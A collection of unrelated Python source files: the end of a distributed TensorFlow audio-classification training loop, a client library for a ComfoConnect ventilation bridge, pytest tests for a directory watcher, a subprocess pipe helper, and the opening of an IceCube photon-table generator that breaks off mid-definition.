xent = tf.nn.weighted_cross_entropy_with_logits(
logits=logits_tensor, targets=labels, pos_weight=pos_weight, name='xent')
loss_tensor = tf.reduce_mean(xent, name='loss_op')
learning_rate = tf.train.exponential_decay(
init_learning_rate, global_step=global_step, decay_steps=50000, decay_rate=1e-6 * hvd.size())
opt = tf.train.AdamOptimizer(
learning_rate=learning_rate,
epsilon=vggish_params.ADAM_EPSILON)
opt = hvd.DistributedOptimizer(opt)
trainable_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
var_list = [v for v in trainable_vars if 'rnn' in v.name or 'gru' in v.name]
opt.minimize(loss_tensor, global_step=global_step, name='train_op', var_list=var_list)
# ----- tensorboard-------
tf.summary.scalar('loss', loss_tensor) # do not needed. summary_op = tf.summary.merge_all()
hooks = [
# Horovod: BroadcastGlobalVariablesHook broadcasts initial variable states
# from rank 0 to all other processes. This is necessary to ensure consistent
# initialization of all workers when training is started with random weights
# or restored from a checkpoint.
hvd.BroadcastGlobalVariablesHook(0),
# Horovod: adjust number of steps based on number of GPUs.
tf.train.StopAtStepHook(last_step=40008 // hvd.size()),
tf.train.LoggingTensorHook(tensors={'step': global_step, 'loss': loss_tensor},
every_n_iter=10),
# tf.train.SummarySaverHook(save_secs=5, output_dir='./tblogs',summary_op=summary_op),
# tf.train.StepCounterHook(every_n_steps=10),
]
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = str(hvd.local_rank())
checkpoint_dir = './checkpoints_transfer' if hvd.rank() == 0 else None
result_queue = 'result_queue'
scaffold = tf.train.Scaffold(saver=tf.train.Saver(max_to_keep=20))
restart = 1
reinit_global_step = global_step.assign(3000)
# The MonitoredTrainingSession takes care of session initialization,
# restoring from a checkpoint, saving to a checkpoint, and closing when done
# or an error occurs.
with tf.train.MonitoredTrainingSession( checkpoint_dir=checkpoint_dir,
save_checkpoint_steps=500,
summary_dir='./tblogs',
save_summaries_steps=5,
hooks=hooks,
config=config,
scaffold=scaffold ) as sess:
# Locate all the tensors and ops we need for the training loop.
features_tensor = sess.graph.get_tensor_by_name(vggish_params.INPUT_TENSOR_NAME)
sequence_length = sess.graph.get_tensor_by_name('vggish/input_sequence_length:0')
output_tensor = sess.graph.get_tensor_by_name('mix/prediction:0')
labels_tensor = sess.graph.get_tensor_by_name('train/labels:0')
global_step_tensor = tf.train.get_global_step()
loss_tensor = sess.graph.get_tensor_by_name('train/loss_op:0')
train_op = sess.graph.get_operation_by_name('train/train_op')
# connect batch msg queue
credentials = pika.PlainCredentials('myuser', 'mypassword')
with pika.BlockingConnection(
pika.ConnectionParameters('ice-P910',5672,'myvhost',
credentials)) as connection:
channel = connection.channel()
channel.basic_qos(prefetch_count=1) # 消息未处理完前不要发送新的消息
while not sess.should_stop():
method_frame, header_frame, body = channel.basic_get(queue=result_queue) # consumer
if method_frame:
# print(method_frame)
batch_x_mfcc, batch_y_mfcc, batch_seq_len = cPickle.loads(body) # print(batch_x_mfcc.shape) # print(batch_y_mfcc.shape)
channel.basic_ack(method_frame.delivery_tag)
if len(batch_x_mfcc) != batch_size:
continue
batch_y_mfcc = labels_merge(batch_y_mfcc, labels_map_mask, labels_map_uumask)
if method_frame.message_count > 400: # consumer can't process too much messages.
print('result_queue has too much msgs, clip them.')
for _ in range(100):
method_frame, header_frame, body = channel.basic_get(queue=result_queue)
channel.basic_ack(method_frame.delivery_tag)
# train
if restart:
restart = 0
[num_steps, loss, lr, _] = sess.run([reinit_global_step, loss_tensor, learning_rate, train_op],
feed_dict={ features_tensor: batch_x_mfcc,
labels_tensor: batch_y_mfcc,
sequence_length: batch_seq_len})
else:
[num_steps, loss, lr, _] = sess.run([global_step_tensor, loss_tensor, learning_rate, train_op],
feed_dict={ features_tensor: batch_x_mfcc,
labels_tensor: batch_y_mfcc,
sequence_length: batch_seq_len})
if num_steps % 10 == 0:
print('steps: ', num_steps, 'loss: ', loss, 'lr: ', lr)
# evaluate
if (num_steps != 0) and (num_steps % 1000 == 0) and (hvd.rank() == 0):
logging.info("------------------")
# logging.info(
# "Iteration: {}, train time: {:.3f} s".format(
# num_steps, time.time() - train_time))
logging.info("Test statistics:")
# tensorflow/core/framework/allocator.cc:101] Allocation of 561807360 exceeds 10% of system memory.
output = []
test_len = len(test_x_mfcc)
start_pos = 0
max_iter_len = batch_size # 300 overflow GPU
while True:
print(start_pos)
iter_test_len = ((test_len - start_pos) if ((test_len - start_pos) < max_iter_len) else max_iter_len)
if (iter_test_len <= 0):
break
local_output = sess.run(output_tensor,
feed_dict={
features_tensor: test_x_mfcc[start_pos:start_pos+iter_test_len],
labels_tensor: test_y_mfcc[start_pos:start_pos+iter_test_len],
sequence_length: test_seq_len[start_pos:start_pos+iter_test_len],
})
# print('local_output.shape', local_output.shape)
output = ( local_output if (output == []) else np.concatenate((output, local_output)) )
start_pos += iter_test_len
# output = sess.run(output_tensor, feed_dict={features_tensor: test_x_mfcc}) #output = model.predict(input)
print('output', output.shape)
print('test_y_mfcc', test_y_mfcc.shape)
mAP, _, AP = tf_evaluate(
target=test_y_mfcc,
output=output,
stats_dir=os.path.join(stats_dir, "test"),
probs_dir=os.path.join(probs_dir, "test"),
iteration=num_steps,
labels_map=labels_dict['id'])
labels_dict['AP'] = AP
for (name, ap) in zip(labels_dict['name'], labels_dict['AP']):
print(name, '\t', ap)
# infer = np.argsort (-output[0])
# print(output[0][infer][:40])
# if IS_DISTRIBUTE:
# task_generate_batch.terminate() # parallel related.
# train_writer.close() # summary related.
|
comfoconnect.py | import logging
import queue
import struct
import threading
import time
from .bridge import Bridge
from .error import *
from .message import Message
from .zehnder_pb2 import *
KEEPALIVE = 60
DEFAULT_LOCAL_UUID = bytes.fromhex('00000000000000000000000000001337')
DEFAULT_LOCAL_DEVICENAME = 'pycomfoconnect'
DEFAULT_PIN = 0
_LOGGER = logging.getLogger('comfoconnect')
# Sensor variable size
RPDO_TYPE_MAP = {
16: 1,
33: 1,
37: 1,
49: 1,
53: 1,
56: 1,
65: 1,
66: 1,
67: 1,
70: 1,
71: 1,
81: 3,
82: 3,
85: 3,
86: 3,
87: 3,
117: 1,
118: 1,
119: 2,
120: 2,
121: 2,
122: 2,
128: 2,
129: 2,
130: 2,
144: 2,
145: 2,
146: 2,
176: 1,
192: 2,
208: 1,
209: 6,
210: 0,
211: 0,
212: 6,
213: 2,
214: 2,
215: 2,
216: 2,
217: 2,
218: 2,
219: 2,
221: 6,
224: 1,
225: 1,
226: 2,
227: 1,
228: 1,
274: 6,
275: 6,
276: 6,
290: 1,
291: 1,
292: 1,
294: 1,
321: 2,
325: 2,
337: 3,
338: 3,
341: 3,
369: 1,
370: 1,
371: 1,
372: 1,
384: 6,
386: 0,
400: 6,
401: 1,
402: 0,
416: 6,
417: 6,
418: 1,
419: 0,
}
class ComfoConnect(object):
"""Implements the commands to communicate with the ComfoConnect ventilation unit."""
"""Callback function to invoke when sensor updates are received."""
callback_sensor = None
def __init__(self, bridge: Bridge, local_uuid=DEFAULT_LOCAL_UUID, local_devicename=DEFAULT_LOCAL_DEVICENAME,
pin=DEFAULT_PIN):
self._bridge = bridge
self._local_uuid = local_uuid
self._local_devicename = local_devicename
self._pin = pin
self._reference = 1
self._queue = queue.Queue()
self._connected = threading.Event()
self._stopping = False
self._message_thread = None
self._connection_thread = None
self.sensors = {}
# ==================================================================================================================
# Core functions
# ==================================================================================================================
def connect(self, takeover=False):
"""Connect to the bridge and login. Disconnect existing clients if needed by default."""
try:
# Start connection
self._connect(takeover=takeover)
except PyComfoConnectNotAllowed:
raise Exception('Could not connect to the bridge since the PIN seems to be invalid.')
except PyComfoConnectOtherSession:
raise Exception('Could not connect to the bridge since there is already an open session.')
except Exception as exc:
_LOGGER.error(exc)
raise Exception('Could not connect to the bridge.')
# Set the stopping flag
self._stopping = False
self._connected.clear()
# Start connection thread
self._connection_thread = threading.Thread(target=self._connection_thread_loop)
self._connection_thread.start()
if not self._connected.wait(10):
raise Exception('Could not connect to bridge since it didn\'t reply on time.')
return True
def disconnect(self):
"""Disconnect from the bridge."""
# Set the stopping flag
self._stopping = True
# Wait for the background thread to finish
self._connection_thread.join()
self._connection_thread = None
def is_connected(self):
"""Returns whether there is a connection with the bridge."""
return self._bridge.is_connected()
def register_sensor(self, sensor_id: int, sensor_type: int = None):
"""Register a sensor on the bridge and keep it in memory that we are registered to this sensor."""
if not sensor_type:
sensor_type = RPDO_TYPE_MAP.get(sensor_id)
if sensor_type is None:
raise Exception("Registering sensor %d with unknown type" % sensor_id)
# Register on bridge
try:
reply = self.cmd_rpdo_request(sensor_id, sensor_type)
except PyComfoConnectNotAllowed:
return None
# Register in memory
self.sensors[sensor_id] = sensor_type
return reply
def unregister_sensor(self, sensor_id: int, sensor_type: int = None):
"""Register a sensor on the bridge and keep it in memory that we are registered to this sensor."""
if sensor_type is None:
sensor_type = RPDO_TYPE_MAP.get(sensor_id)
if sensor_type is None:
raise Exception("Unregistering sensor %d with unknown type" % sensor_id)
# Unregister in memory
self.sensors.pop(sensor_id, None)
# Unregister on bridge
self.cmd_rpdo_request(sensor_id, sensor_type, timeout=0)
def _command(self, command, params=None, use_queue=True):
"""Sends a command and wait for a response if the request is known to return a result."""
# Construct the message
message = Message.create(
self._local_uuid,
self._bridge.uuid,
command,
{'reference': self._reference},
params
)
# Increase message reference
self._reference += 1
# Send the message
self._bridge.write_message(message)
try:
# Check if this command has a confirm type set
confirm_type = message.class_to_confirm[command]
# Read a message
reply = self._get_reply(confirm_type, use_queue=use_queue)
return reply
except KeyError:
return None
def _get_reply(self, confirm_type=None, timeout=5, use_queue=True):
"""Pops a message of the queue, optionally looking for a specific type."""
start = time.time()
while True:
message = None
if use_queue:
try:
# Fetch the message from the queue. The network thread has put it there for us.
message = self._queue.get(timeout=timeout)
if message:
self._queue.task_done()
except queue.Empty:
# We got no message
pass
else:
# Fetch the message directly from the socket
message = self._bridge.read_message(timeout=timeout)
if message:
# Check status code
if message.cmd.result == GatewayOperation.OK:
pass
elif message.cmd.result == GatewayOperation.BAD_REQUEST:
raise PyComfoConnectBadRequest()
elif message.cmd.result == GatewayOperation.INTERNAL_ERROR:
raise PyComfoConnectInternalError()
elif message.cmd.result == GatewayOperation.NOT_REACHABLE:
raise PyComfoConnectNotReachable()
elif message.cmd.result == GatewayOperation.OTHER_SESSION:
raise PyComfoConnectOtherSession(message.msg.devicename)
elif message.cmd.result == GatewayOperation.NOT_ALLOWED:
raise PyComfoConnectNotAllowed()
elif message.cmd.result == GatewayOperation.NO_RESOURCES:
raise PyComfoConnectNoResources()
elif message.cmd.result == GatewayOperation.NOT_EXIST:
raise PyComfoConnectNotExist()
elif message.cmd.result == GatewayOperation.RMI_ERROR:
raise PyComfoConnectRmiError()
if confirm_type is None:
# We just need a message
return message
elif message.msg.__class__ == confirm_type:
# We need the message with the correct type
return message
else:
# We got a message with an incorrect type. Hopefully, this doesn't happen to often,
# since we just put it back on the queue.
self._queue.put(message)
if time.time() - start > timeout:
raise ValueError('Timeout waiting for response.')
# ==================================================================================================================
# Connection thread
# ==================================================================================================================
def _connection_thread_loop(self):
"""Makes sure that there is a connection open."""
self._stopping = False
while not self._stopping:
# Start connection
if not self.is_connected():
# Wait a bit to avoid hammering the bridge
time.sleep(5)
try:
# Connect or re-connect
self._connect()
except PyComfoConnectOtherSession:
self._bridge.disconnect()
_LOGGER.error('Could not connect to the bridge since there is already an open session.')
continue
except Exception as exc:
_LOGGER.error(exc)
raise Exception('Could not connect to the bridge.')
# Start background thread
self._message_thread = threading.Thread(target=self._message_thread_loop)
self._message_thread.start()
# Re-register for sensor updates
for sensor_id in self.sensors:
self.cmd_rpdo_request(sensor_id, self.sensors[sensor_id])
# Send the event that we are ready
self._connected.set()
# Wait until the message thread stops working
self._message_thread.join()
# Close socket connection
self._bridge.disconnect()
def _connect(self, takeover=False):
"""Connect to the bridge and login. Disconnect existing clients if needed by default."""
try:
# Connect to the bridge
self._bridge.connect()
# Login
self.cmd_start_session(takeover, use_queue=False)
except PyComfoConnectNotAllowed:
# No dice, maybe we are not registered yet...
# Register
self.cmd_register_app(self._local_uuid, self._local_devicename, self._pin, use_queue=False)
# Login
self.cmd_start_session(takeover, use_queue=False)
return True
# ==================================================================================================================
# Message thread
# ==================================================================================================================
def _message_thread_loop(self):
"""Listen for incoming messages and queue them or send them to a callback method."""
# Reinitialise the queues
self._queue = queue.Queue()
next_keepalive = 0
while not self._stopping:
# Sends a keepalive every KEEPALIVE seconds.
if time.time() > next_keepalive:
next_keepalive = time.time() + KEEPALIVE
self.cmd_keepalive()
try:
# Read a message from the bridge.
message = self._bridge.read_message()
except BrokenPipeError as exc:
# Close this thread. The connection_thread will restart us.
_LOGGER.warning('THe connection was broken. We will try to reconnect later.')
return
if message:
if message.cmd.type == GatewayOperation.CnRpdoNotificationType:
self._handle_rpdo_notification(message)
elif message.cmd.type == GatewayOperation.GatewayNotificationType:
_LOGGER.info('Unhandled GatewayNotificationType')
# TODO: We should probably handle these somehow
pass
elif message.cmd.type == GatewayOperation.CnNodeNotificationType:
_LOGGER.info('Unhandled CnNodeNotificationType')
# TODO: We should probably handle these somehow
pass
elif message.cmd.type == GatewayOperation.CnAlarmNotificationType:
_LOGGER.info('Unhandled CnAlarmNotificationType')
# TODO: We should probably handle these somehow
pass
elif message.cmd.type == GatewayOperation.CloseSessionRequestType:
_LOGGER.info('The Bridge has asked us to close the connection. We will try to reconnect later.')
# Close this thread. The connection_thread will restart us.
return
else:
# Send other messages to a queue
self._queue.put(message)
return
def _handle_rpdo_notification(self, message):
"""Update internal sensor state and invoke callback."""
# Only process CnRpdoNotificationType
if message.cmd.type != GatewayOperation.CnRpdoNotificationType:
return False
# Extract data
data = message.msg.data.hex()
if len(data) == 2:
val = struct.unpack('b', message.msg.data)[0]
elif len(data) == 4:
val = struct.unpack('h', message.msg.data)[0]
elif len(data) == 8:
val = data
else:
val = data
# Update local state
# self.sensors[message.msg.pdid] = val
if self.callback_sensor:
self.callback_sensor(message.msg.pdid, val)
return True
# ==================================================================================================================
# Commands
# ==================================================================================================================
def cmd_start_session(self, take_over=False, use_queue: bool = True):
"""Starts the session on the device by logging in and optionally disconnecting an already existing session."""
reply = self._command(
StartSessionRequest,
{
'takeover': take_over
},
use_queue=use_queue
)
return reply # TODO: parse output
def cmd_close_session(self, use_queue: bool = True):
"""Stops the current session."""
reply = self._command(
CloseSessionRequest,
use_queue=use_queue
)
return reply # TODO: parse output
def cmd_list_registered_apps(self, use_queue: bool = True):
"""Returns a list of all the registered clients."""
reply = self._command(
ListRegisteredAppsRequest,
use_queue=use_queue
)
return [
{'uuid': app.uuid, 'devicename': app.devicename} for app in reply.msg.apps
]
def cmd_register_app(self, uuid, device_name, pin, use_queue: bool = True):
"""Register a new app by specifying our own uuid, device_name and pin code."""
reply = self._command(
RegisterAppRequest,
{
'uuid': uuid,
'devicename': device_name,
'pin': pin,
},
use_queue=use_queue
)
return reply # TODO: parse output
def cmd_deregister_app(self, uuid, use_queue: bool = True):
"""Remove the specified app from the registration list."""
if uuid == self._local_uuid:
raise Exception('You should not deregister yourself.')
try:
self._command(
DeregisterAppRequest,
{
'uuid': uuid
},
use_queue=use_queue
)
return True
except PyComfoConnectBadRequest:
return False
def cmd_version_request(self, use_queue: bool = True):
"""Returns version information."""
reply = self._command(
VersionRequest,
use_queue=use_queue
)
return {
'gatewayVersion': reply.msg.gatewayVersion,
'serialNumber': reply.msg.serialNumber,
'comfoNetVersion': reply.msg.comfoNetVersion,
}
def cmd_time_request(self, use_queue: bool = True):
"""Returns the current time on the device."""
reply = self._command(
CnTimeRequest,
use_queue=use_queue
)
return reply.msg.currentTime
def cmd_rmi_request(self, message, node_id: int = 1, use_queue: bool = True):
"""Sends a RMI request."""
reply = self._command(
CnRmiRequest,
{
'nodeId': node_id or 1,
'message': message
},
use_queue=use_queue
)
return True
def cmd_rpdo_request(self, pdid: int, type: int = 1, zone: int = 1, timeout=None, use_queue: bool = True):
"""Register a RPDO request."""
reply = self._command(
CnRpdoRequest,
{
'pdid': pdid,
'type': type,
'zone': zone or 1,
'timeout': timeout
},
use_queue=use_queue
)
return reply
def cmd_keepalive(self, use_queue: bool = True):
"""Sends a keepalive."""
self._command(
KeepAlive,
use_queue=use_queue
)
return True
|
test_watch.py | """Test helpers module."""
import os
import shutil
import multiprocessing
import time
import pytest
import watch
fixtures_dir = os.path.join('tests', 'fixtures')
@pytest.fixture
def setup(request):
"""Remove files created."""
cwd = os.getcwd()
os.chdir(fixtures_dir)
os.mkdir('watch1')
os.mkdir('watch2')
open(os.path.join('watch1', 'onetep.dat'), 'a').close()
open(os.path.join('watch3'), 'a').close()
def fin():
shutil.rmtree('watch1')
shutil.rmtree('watch2')
os.remove('watch3')
os.chdir(cwd)
request.addfinalizer(fin)
@pytest.fixture
def setup_process_dirs(request):
"""Create the necessary files for process_dirs function."""
error_dir = os.path.join(fixtures_dir, 'watch_error')
completed_dir = os.path.join(fixtures_dir, 'watch_completed')
completed_dir = os.path.join(fixtures_dir, 'watch_completed')
empty_dir = os.path.join(fixtures_dir, 'watch_empty')
os.mkdir(error_dir)
os.mkdir(completed_dir)
os.mkdir(empty_dir)
open(os.path.join(error_dir, 'f.error_message'), 'a').close()
shutil.copy(os.path.join(fixtures_dir, 'one.out'), completed_dir)
def fin():
shutil.rmtree(error_dir)
shutil.rmtree(completed_dir)
shutil.rmtree(empty_dir)
request.addfinalizer(fin)
@pytest.fixture
def setup_run(request):
"""Create the necessary files for run function."""
error_dir = os.path.join(fixtures_dir, 'run_error')
completed_dir = os.path.join(fixtures_dir, 'run_completed')
empty_dir = os.path.join(fixtures_dir, 'run_empty')
os.mkdir(error_dir)
os.mkdir(completed_dir)
os.mkdir(empty_dir)
shutil.copy(os.path.join(fixtures_dir, 'one.out'), empty_dir)
def create_output():
time.sleep(0.1)
error_file = os.path.join(error_dir, 'f.error_message')
completed_file = os.path.join(completed_dir, 'f.out')
open(error_file, 'a').close()
with open(completed_file, 'w') as f:
f.write('line1\nline2\nline3\nline4\nline5\n'
'Job started: foo\nJob completed: bar')
d = multiprocessing.Process(target=create_output)
d.daemon = True
d.start()
def fin():
shutil.rmtree(error_dir)
shutil.rmtree(completed_dir)
shutil.rmtree(empty_dir)
request.addfinalizer(fin)
@pytest.mark.parametrize('args', [
[],
['*'],
['watch*'],
['watch1']
])
def test_watchdirs(args, setup):
expected = ['watch1']
if args == []:
os.chdir('watch1')
expected = ['./']
out = watch.watchdirs(args, 'dat')
if args == []:
os.chdir('../')
assert out == expected
def test_process_dirs(setup_process_dirs):
"""Test process_dirs function within Watch class."""
config = {
'outfile_ext': 'out',
'interval': 1
}
watch_dirs = [
os.path.join(fixtures_dir, 'watch_error'),
os.path.join(fixtures_dir, 'watch_completed'),
os.path.join(fixtures_dir, 'watch_empty')
]
w = watch.Watch(watch_dirs, config)
out = w.process_dirs()
expected = [
{
'have_errfile': True,
'have_outfile': False,
'completed': True
},
{
'have_errfile': False,
'have_outfile': True,
'completed': True
},
{
'have_errfile': False,
'have_outfile': False,
'completed': False
}
]
assert out == expected
def test_run(setup_run):
log_file = 'teptools-' + time.strftime('%d%m%Y-%H%M') + '.log'
config = {
'outfile_ext': 'out',
'interval': 0.3,
'email': ''
}
watch_dirs = [
os.path.join(fixtures_dir, 'run_error'),
os.path.join(fixtures_dir, 'run_completed'),
os.path.join(fixtures_dir, 'run_empty')
]
expected = [
(' tests/fixtures/run_error failed\n'),
(' tests/fixtures/run_completed successfully completed\n')
]
w = watch.Watch(watch_dirs, config)
w.run()
with open(log_file, 'r') as f:
out = f.readlines()
os.remove(log_file)
for i in range(len(out)):
assert out[i].endswith(expected[i])
|
systematizing.py | """
Created on Oct 22, 2013
@author: rgeorgi
"""
import subprocess
import sys
import logging
from threading import Thread
from queue import Empty, Queue
from unittest.case import TestCase
import time
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def thread_handler(out, func):
for line in iter(out.readline, b''):
func(line.decode('utf-8').strip())
def handle_stderr(p, queue, func):
while p.poll() is None:
try:
data = queue.get_nowait()
except Empty:
pass
else:
func(data.decode('utf-8'))
class ProcessCommunicator(object):
"""
This is a class to make communicating between a commandline program easier.
It will make available stdin and stdout pipes, while allowing for the stderr
to be handled by a custom handler.
"""
def __init__(self, cmd, stdout_func=None, stderr_func=None, shell=False, blocking=False):
"""
Execute a command, ``cmd`` and save the stdin/stdout for communication,
but allow the stderr to be read in a non-blocking manner and printed using
stderr_func.
:param cmd: Command to be run
:type cmd: str or list
:param stderr_func: Function to handle the stderr strings.
:type stderr_func: func
"""
# 1) Initialize the subprocess ---------------------------------------------
self.p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1,
shell=shell)
# -------------------------------------------
# If the stderr_func is None, make sure to apply SOMETHING
# so that the thread won't deadlock
if stderr_func is None:
stderr_func = lambda x: x
stderr_t = Thread(target=thread_handler, args=(self.p.stderr, stderr_func))
stderr_t.daemon = True
stderr_t.start()
if stdout_func is None and not blocking:
stdout_func = lambda x: x
if stdout_func is not None:
stdout_t = Thread(target=thread_handler, args=(self.p.stdout, stdout_func))
stdout_t.daemon = True
stdout_t.start()
def wait(self):
return self.p.wait()
def poll(self):
return self.p.poll()
def kill(self):
return self.p.kill()
@property
def stdout(self):
return self.p.stdout
@property
def stderr(self):
return self.p.stderr
@property
def stdin(self):
return self.p.stdin
def piperunner(cmd, log_name=None):
"""
Fancy way to call a blocking subprocess and log its activity, while
:param cmd:
:type cmd:
:param log_name:
:type log_name:
"""
if not log_name:
out_func = sys.stdout.write
else:
logger = logging.getLogger(log_name)
out_func = logger.info
out_func('-'*35+' COMMAND: ' + '-'*35+'\n')
out_func(cmd+'\n'+'-'*80+'\n')
p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, q))
t.daemon = True
t.start()
while p.poll() is None:
try:
data = q.get_nowait()
time.sleep(1)
except Empty:
pass
else:
out_func(data.decode('utf-8').strip())
return p.returncode
#===============================================================================
# Testcases
#===============================================================================
class ProcessCommunicatorTest(TestCase):
def error_test(self):
self.pc = ProcessCommunicator(['echo', 'asdf '], stdout_func=print)
print(self.pc.wait())
|
generate_clsim_table.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=wrong-import-position, invalid-name, no-member, no-name-in-module
# pylint: disable=import-error
"""
Create a Retro table: Propagate light outwards from a DOM and tabulate the
photons. Uses CLSim (tabulator) to do the work of photon propagation.
"""
# TODO: command-line option to simply return the metadata for a config to e.g.
# extract a hash value one would expect from the given params
from __future__ import absolute_import, division, print_function
__all__ = [
'get_average_dom_z_coords',
'generate_clsim_table',
'parse_args',
]
__author__ = 'P. Eller, J.L. Lanfranchi'
__license__ = '''Copyright 2017 Philipp Eller, Justin L. Lanfranchi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
from argparse import ArgumentParser
from collections import OrderedDict
from os import (
access, environ, getpid, pathsep, remove, X_OK
)
from os.path import (
abspath, dirname, exists, expanduser, expandvars, isfile, join, split
)
import json
from numbers import Integral
import subprocess
import sys
import threading
import time
import numpy as np
from I3Tray import I3Tray
from icecube.clsim import (
AutoSetGeant4Environment,
GetDefaultParameterizationList,
GetFlasherParameterizationList,
#GetIceCubeDOMAcceptance,
I3CLSimFunctionConstant,
I3CLSimFlasherPulse,
I3CLSimFlasherPulseSeries,
I3CLSimLightSourceToStepConverterGeant4,
I3CLSimLightSourceToStepConverterPPC,
I3CLSimSpectrumTable,
)
from icecube.clsim.tabulator import (
LinearAxis,
PowerAxis,
SphericalAxes,
)
from icecube.clsim.traysegments.common import (
configureOpenCLDevices,
parseIceModel,
)
from icecube import dataclasses
from icecube.dataclasses import (
I3Direction,
I3Particle,
I3Position,
)
from icecube.icetray import I3Frame, I3Module, I3Units, logging, traysegment
from icecube.photospline.photonics import FITSTable
from icecube.phys_services import I3GSLRandomService
if __name__ == '__main__' and __package__ is None:
RETRO_DIR = dirname(dirname(dirname(abspath(__file__))))
if RETRO_DIR not in sys.path:
sys.path.append(RETRO_DIR)
from retro.i3info.extract_gcd import extract_gcd
from retro.utils.misc import expand, hash_obj, mkdir
from retro.tables.clsim_tables import (
CLSIM_TABLE_FNAME_PROTO,
CLSIM_TABLE_METANAME_PROTO,
CLSIM_TABLE_TILE_FNAME_PROTO,
CLSIM_TABLE_TILE_METANAME_PROTO,
)
DOM_RADIUS = 0.16510*I3Units.m # 13" diameter
DOM_SURFACE_AREA = np.pi * DOM_RADIUS**2
BINNING_ORDER = {
'spherical': [
'r',
'costheta',
'phi',
't',
'costhetadir',
'deltaphidir',
],
'cartesian': [
'x',
'y',
'z',
't',
'costhetadir',
'phidir',
]
}
def get_average_dom_z_coords(geo):
"""Find average z coordinates for IceCube (non-DeepCore) and DeepCore
"z-layers" of DOMs.
A "z-layer" of DOMs is defined by all DOMs on all strings of a given string
type with shared DOM (OM) indices.
Parameters
----------
geo : (n_strings, n_doms_per_string, 3) array
(x, y, z) coordinate for string 1 (string index 0) DOM 1 (dom index 0) is found at geo[0, 0]
Returns
-------
ic_avg_z : shape (n_doms_per_string) array
dc_avg_z : shape (n_doms_per_string) array
"""
ic_avg_z = geo[:78, :, 2].mean(axis=0)
dc_avg_z = geo[78:, :, 2].mean(axis=0)
return ic_avg_z, dc_avg_z
def make_retro_pulse(x, y, z, zenith, azimuth):
"""Retro pulses originate from a DOM with an (x, y, z) coordinate and
(potentially) a zenith and azimuth orientation (though for now the latter
are ignored).
"""
pulse = I3CLSimFlasherPulse()
pulse.type = I3CLSimFlasherPulse.FlasherPulseType.retro
pulse.pos = I3Position(x, y, z)
pulse.dir = I3Direction(zenith, azimuth)
pulse.time = 0.0
pulse.numberOfPhotonsNoBias = 10000.
# Following values don't make a difference
pulse.pulseWidth = 1.0 * I3Units.ns
pulse.angularEmissionSigmaPolar = 360.0 * I3Units.deg
pulse.angularEmissionSigmaAzimuthal = 360.0 * I3Units.deg
return pulse
def unpin_threads(delay=60):
"""
When AMD OpenCL fissions the CPU device, it pins each sub-device to a
a physical core. Since we always use sub-device 0, this means that multiple
instances of the tabulator on a single machine will compete for core 0.
Reset thread affinity after *delay* seconds to prevent this from happening.
"""
# pylint: disable=missing-docstring
def which(program):
def is_exe(fpath):
return exists(fpath) and access(fpath, X_OK)
def ext_candidates(fpath):
yield fpath
for ext in environ.get('PATHEXT', '').split(pathsep):
yield fpath + ext
fpath, _ = split(program)
if fpath:
if is_exe(program):
return program
else:
for path in environ['PATH'].split(pathsep):
exe_file = join(path, program)
for candidate in ext_candidates(exe_file):
if is_exe(candidate):
return candidate
def taskset(pid, tt=None):
# get/set the taskset affinity for pid
# uses a binary number string for the core affinity
l = [which('taskset'), '-p']
if tt:
l.append(hex(int(tt, 2))[2:])
l.append(str(pid))
p = subprocess.Popen(l, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.communicate()[0].split(':')[-1].strip()
if not tt:
return bin(int(output, 16))[2:]
def resetTasksetThreads(main_pid):
# reset thread taskset affinity
time.sleep(delay)
num_cpus = reduce(
lambda b, a: b + int('processor' in a), open('/proc/cpuinfo').readlines(),
0
)
tt = '1'*num_cpus
#tt = taskset(main_pid)
p = subprocess.Popen(
[which('ps'), '-Lo', 'tid', '--no-headers', '%d'%main_pid],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
for tid in p.communicate()[0].split():
tid = tid.strip()
if tid:
taskset(tid, tt)
# only do this on linux
try:
open('/proc/cpuinfo')
except IOError:
return
# and only if taskset exists
if not which('taskset'):
return
threading.Thread(target=resetTasksetThreads, args=(getpid(),)).start()
@traysegment
def TabulateRetroSources(
tray,
name,
source_gcd_i3_md5,
binning_kw,
axes,
ice_model,
angular_sensitivity,
disable_tilt,
disable_anisotropy,
hash_val,
dom_spec,
dom_x,
dom_y,
dom_z,
dom_zenith,
dom_azimuth,
seed,
n_events,
tablepath,
tile=None,
record_errors=False,
):
dom_x = dom_x * I3Units.m
dom_y = dom_y * I3Units.m
dom_z = dom_z * I3Units.m
dom_zenith = dom_zenith * I3Units.rad
dom_azimuth = dom_azimuth * I3Units.rad
tablepath = expanduser(expandvars(tablepath))
random_service = I3GSLRandomService(seed)
tray.AddModule(
'I3InfiniteSource', name + 'streams',
Stream=I3Frame.DAQ
)
tray.AddModule(
'I3MCEventHeaderGenerator',
name + 'gen_header',
Year=2009,
DAQTime=158100000000000000,
RunNumber=1,
EventID=1,
IncrementEventID=True
)
flasher_pulse_series_name = 'I3FlasherPulseSeriesMap'
def reference_source(x, y, z, zenith, azimuth, scale):
source = I3Particle()
source.pos = I3Position(x, y, z)
source.dir = I3Direction(zenith, azimuth)
source.time = 0.0
# Following are not used (at least not yet)
source.type = I3Particle.ParticleType.EMinus
source.energy = 1.0*scale
source.length = 0.0
source.location_type = I3Particle.LocationType.InIce
return source
class MakeParticle(I3Module):
def __init__(self, ctx):
super(MakeParticle, self).__init__(ctx)
self.AddOutBox('OutBox')
self.AddParameter('source_function', '', lambda: None)
self.AddParameter('n_events', '', 100)
self.reference_source = None
self.n_events = None
self.emitted_events = None
def Configure(self):
self.reference_source = self.GetParameter('source_function')
self.n_events = self.GetParameter('n_events')
self.emitted_events = 0
def DAQ(self, frame):
